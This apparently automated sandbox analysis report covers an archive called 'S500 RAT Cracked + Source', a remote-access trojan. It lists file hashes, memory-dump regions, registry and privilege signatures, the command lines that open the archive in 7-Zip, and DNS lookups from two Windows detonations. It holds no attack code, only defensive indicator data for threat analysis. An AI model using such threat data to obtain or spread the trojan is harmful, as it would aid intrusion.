C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12
| MD5 | c60e527a85f285ddc66c2fcf160b1be7 |
| SHA1 | abcf2b6bffea9f0f30190783f6eae2434ef7a9a8 |
| SHA256 | 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f |
| SHA512 | 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e |
memory/3768-592-0x000002616C8E0000-0x000002616C91C000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll
| MD5 | 17cbdd9e4cb0ede2fad8c08c05fdaa84 |
| SHA1 | 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c |
| SHA256 | d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441 |
| SHA512 | 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a |
memory/3768-643-0x000002613AB40000-0x000002613AB50000-memory.dmp
C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\System\Process.txt
| MD5 | 0cfc72d4b2ba7e01d8fd978431f377a7 |
| SHA1 | 595abcdfdc505f461a2092c17b5dc4b6b78253b9 |
| SHA256 | 4b6f8aba628f8446e11d058f196723227c01a0d278996dc50cd580be9f3567f3 |
| SHA512 | 72d1b0265fdd09c1a008eb6350222af53a166fd7c0ee7795d0d0a6fc6bd84d32bc185873951fd885e2588c6af9c6e6b4897364119002ef1e1b8fa6ce42ea9858 |
memory/3768-666-0x00007FF9B6EB0000-0x00007FF9B6ED7000-memory.dmp
memory/4148-667-0x0000000005200000-0x0000000005210000-memory.dmp
memory/4148-669-0x0000000006140000-0x00000000061D2000-memory.dmp
memory/4148-670-0x00000000066E0000-0x0000000006BDE000-memory.dmp
memory/3768-673-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/3768-676-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/3768-677-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/4148-678-0x0000000006230000-0x000000000623A000-memory.dmp
memory/3768-679-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/3768-680-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/4148-681-0x0000000005200000-0x0000000005210000-memory.dmp
C:\Users\Admin\AppData\Local\1ca9a780f62d391eab5af10e0d5b79d1\msgid.dat
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/4148-688-0x00000000063A0000-0x00000000063B2000-memory.dmp
memory/3768-728-0x0000026164E80000-0x0000026164F80000-memory.dmp
memory/3768-732-0x0000026164E80000-0x0000026164F80000-memory.dmp
memory/3768-736-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp
memory/364-740-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp
memory/364-741-0x000001F139C50000-0x000001F139C60000-memory.dmp
memory/364-743-0x000001F139C50000-0x000001F139C60000-memory.dmp
memory/364-744-0x000001F139C90000-0x000001F139CB2000-memory.dmp
memory/364-747-0x000001F139E40000-0x000001F139EB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1xbvrcg.pvm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/364-762-0x000001F139C50000-0x000001F139C60000-memory.dmp
memory/364-787-0x000001F139C50000-0x000001F139C60000-memory.dmp
memory/364-791-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp
memory/4604-792-0x0000000000400000-0x0000000000439000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:46
Platform
win10v2004-20240226-en
Max time kernel
425s
Max time network
1153s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4652 wrote to memory of 896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 4652 wrote to memory of 896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:46
Platform
win11-20240221-en
Max time kernel
452s
Max time network
1174s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2332 wrote to memory of 3712 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2332 wrote to memory of 3712 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |